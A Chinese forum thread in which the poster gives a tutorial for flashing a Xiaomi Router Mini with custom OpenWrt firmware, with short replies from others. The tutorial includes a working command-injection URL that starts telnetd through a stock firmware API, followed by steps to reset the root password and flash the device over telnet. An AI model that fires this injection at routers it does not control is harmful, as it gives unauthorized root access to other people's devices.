小米路由器mini 刷机openwrt科学路由系统教程

系统安装、升级讨论
版面规则
我们都知道新人的确很菜,也喜欢抱怨,并且带有浓厚的Windows习惯,但既然在这里询问,我们就应该有责任帮助他们解决问题,而不是直接泼冷水、简单的否定或发表对解决问题没有任何帮助的帖子。乐于分享,以人为本,这正是Ubuntu的精神所在。
回复
头像
ptpt52
帖子: 717
注册时间: 2008-07-27 8:51
系统: Ubuntu/Windows
来自: 广西玉林|广东深圳
联系:

小米路由器mini 刷机openwrt科学路由系统教程

#1

帖子 ptpt52 » 2016-07-18 17:19

for 小米路由器mini
在ubuntu编译好的科学路由器固件下载地址

本文刷机的固件是由ptpt52发布的科学上网路由器固件,下载地址:

代码: 全选

http://router-sh.ptpt52.com/rom/ptpt52-2.0.0_build201612311228-ramips-mt7620-miwifi-mini-squashfs-sysupgrade.bin

1.
下载 miwifi 路由器 2.6.17 版本的固件,我们需要利用这个固件的漏洞进行刷机

代码: 全选

http://bigota.miwifi.com/xiaoqiang/rom/r1cm/miwifi_r1cm_firmware_ace10_2.6.17.bin
2.
你可能已经更新过版本,我们需要降级到 2.6.17 版本
登录小米路由器mini的管理页面 http://192.168.31.1/ 选择升级,手动升级,选择文件 miwifi_r1cm_firmware_ace10_2.6.17.bin
升级的时候注意要选择恢复默认配置

3.
升级到 2.6.17之后,重新连接小米路由,需要初始化设置密码,比如密码设置成 88888888

4.
开始进行刷机:利用代码注入漏洞
a) 登录 http://192.168.31.1/ 登录后你会看到URL地址里面有个类于 stok=3173f347ad3d391bf7eb48d03ac758b7
b) 记下 3173f347ad3d391bf7eb48d03ac758b7
然后,构造如下的网址:(注意你的stok不是这个,用你自己的替换)

代码: 全选

http://192.168.31.1/cgi-bin/luci/;stok=3173f347ad3d391bf7eb48d03ac758b7/api/xqnetwork/set_wifi_ap?ssid=whatever&encryption=NONE&enctype=NONE&channel=1%3B%2Fusr%2Fsbin%2Ftelnetd
把这个网址用当前的浏览器 打开,等待30秒钟,出现下面的样子:(此时telnetd 启动成功)

代码: 全选

{"msg":"未能連線到指定Wi-Fi(Probe timeout)","code":1616}
c) 再次,你再用当前浏览器打开下面的地址,(注意stok要替换你自己的哦)这里假设你刚才设置密码是 88888888

代码: 全选

http://192.168.31.1/cgi-bin/luci/;stok=3173f347ad3d391bf7eb48d03ac758b7/api/xqsystem/set_name_password?oldPwd=88888888&newPwd=11111111
完成上述步骤之后,就可以用 telnet 连接路由器了
telnet 192.168.31.1
提示登录
用户名 root
密码 11111111

登录后,在保证小米路由器联网的情况下,下载固件进行刷机:

代码: 全选

cd /tmp/
wget -O miwifi.bin http://router-sh.ptpt52.com/rom/ptpt52-2.0.0_build201612311228-ramips-mt7620-miwifi-mini-squashfs-sysupgrade.bin
下载完成
确认板子
cat /proc/mtd
如果看到结果是这样:
root@XiaoQiang:~# cat /proc/mtd
dev: size erasesize name
mtd0: 01000000 00010000 "ALL"
mtd1: 00030000 00010000 "Bootloader"
mtd2: 00010000 00010000 "Config"
mtd3: 00010000 00010000 "Factory"
mtd4: 00c80000 00010000 "OS1"
mtd5: 00b19a3b 00010000 "rootfs"
mtd6: 00200000 00010000 "OS2"
mtd7: 00100000 00010000 "overlay"
mtd8: 00010000 00010000 "crash"
mtd9: 00010000 00010000 "reserved"
mtd10: 00010000 00010000 "Bdata"
那么就用这个命令刷机:

代码: 全选

mtd -r write miwifi.bin OS1

如果看到是这个样子:
root@XiaoQiang:/tmp# cat /proc/mtd
dev: size erasesize name
mtd0: 01000000 00010000 "ALL"
mtd1: 00030000 00010000 "Bootloader"
mtd2: 00010000 00010000 "Config"
mtd3: 00010000 00010000 "Factory"
mtd4: 00c80000 00010000 "OS1"
mtd5: 00b26e43 00010000 "rootfs"
mtd6: 00200000 00010000 "OS2"
mtd7: 00100000 00010000 "overlay"
mtd8: 00010000 00010000 "crash"
mtd9: 00010000 00010000 "reserved"
mtd10: 00010000 00010000 "Bdata"
mtd11: 00fa0000 00010000 "firmware"

那么就用这个命令刷机:

代码: 全选

mtd -r write miwifi.bin firmware
完成

刷机后自动重启,大概5-8分钟,然后你看到无线 SSID 名字是 PTPT52_XXXX 密码是 88888888
管理页面地址 http://192.168.15.1/
用户名 root
密码 admin

之后你就可以登录进行配置了
附件
7 - 1.jpg
上次由 ptpt52 在 2017-01-08 1:41,总共编辑 2 次。
走过去了也便有了路
http://www.ptpt52.com/
头像
ptpt52
帖子: 717
注册时间: 2008-07-27 8:51
系统: Ubuntu/Windows
来自: 广西玉林|广东深圳
联系:

Re: 小米路由器mini 刷机openwrt科学路由系统教程

#2

帖子 ptpt52 » 2016-07-29 10:44

自己顶起 :em11
走过去了也便有了路
http://www.ptpt52.com/
onlylove
论坛版主
帖子: 5213
注册时间: 2007-01-14 16:23

Re: 小米路由器mini 刷机openwrt科学路由系统教程

#3

帖子 onlylove » 2016-07-29 10:52

我记得可以申请官方解锁root的,这个路由,不过有漏洞的话倒是省了不少事情
#include <stdio.h>
void main()
{
double world;
unsigned letter;
short stay;
long memories;
printf("I miss you.\n");
}
头像
ptpt52
帖子: 717
注册时间: 2008-07-27 8:51
系统: Ubuntu/Windows
来自: 广西玉林|广东深圳
联系:

Re: 小米路由器mini 刷机openwrt科学路由系统教程

#4

帖子 ptpt52 » 2016-12-31 14:32

本路由系统2.0版本已经发布
智能上网,自动学习,自动选路,科学上网
走过去了也便有了路
http://www.ptpt52.com/
huangnian
帖子: 1
注册时间: 2017-02-21 15:36

Re: 小米路由器mini 刷机openwrt科学路由系统教程

#5

帖子 huangnian » 2017-02-21 15:44

:Haha 今晚试试
头像
ptpt52
帖子: 717
注册时间: 2008-07-27 8:51
系统: Ubuntu/Windows
来自: 广西玉林|广东深圳
联系:

Re: 小米路由器mini 刷机openwrt科学路由系统教程

#6

帖子 ptpt52 » 2017-02-28 11:27

https://router-sh.ptpt52.com/rom/
最新下载地址
最新固件:集成ss
走过去了也便有了路
http://www.ptpt52.com/
zhou001
帖子: 1
注册时间: 2017-10-12 9:24
系统: win

Re: 小米路由器mini 刷机openwrt科学路由系统教程

#7

帖子 zhou001 » 2017-10-12 9:37

今晚试试 :Haha
回复